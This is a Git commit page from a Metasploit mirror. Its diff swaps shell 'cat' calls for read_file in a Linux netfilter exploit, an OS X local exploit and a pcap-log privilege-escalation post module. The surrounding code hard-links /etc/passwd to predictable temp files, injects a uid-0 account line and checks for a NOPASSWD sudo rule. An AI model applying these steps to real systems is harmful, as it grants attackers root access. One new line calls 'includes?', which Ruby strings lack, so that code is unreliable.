adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Land #7377, read_file for some modules

Browse Source
This commit is contained in:
William Vu
2016-09-28 18:00:23 -05:00
parent 075401d702 2272e15ca2
commit bcb040c1ac
3 changed files with 5 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/linux/local/netfilter_priv_esc.rb
+1 -1
View File
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
def shemsham_installed?()
# we want this to be false.
vprint_status('Checking if shem or sham are installed')
shemsham = cmd_exec('cat /proc/cpuinfo')
shemsham = read_file('/proc/cpuinfo')
if shemsham.include?('shem')
print_error('shem installed, system not vulnerable.')
elsif shemsham.include?('sham')
modules/exploits/osx/local/rsh_libmalloc.rb
+1 -1
View File
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("Now to check whether the script worked...")
# Check whether it worked
crontab = cmd_exec("cat /etc/crontab")
crontab = read_file("/etc/crontab")
vprint_status("Reading crontab yielded the following response: #{crontab}")
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
vprint_error("Bad news... it did not write to the file.")
modules/post/multi/escalate/metasploit_pcaplog.rb
+3 -3
View File
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post
def run
print_status "Setting up the victim's /tmp dir"
initial_size = cmd_exec("cat /etc/passwd | wc -l")
initial_size = read_file("/etc/passwd").lines.count
print_status "/etc/passwd is currently #{initial_size} lines long"
i = 0
j = 0
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
end
current_size = cmd_exec("cat /etc/passwd | wc -l")
current_size = read_file("/etc/passwd").lines.count
if current_size == initial_size
# PCAP is flowing
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
i = (i+1) % 60 # increment second counter
end
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
if read_file("/etc/passwd").includes?("Metasploit")
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
# TODO: Consider recording our now-created username and password as a valid credential here.
else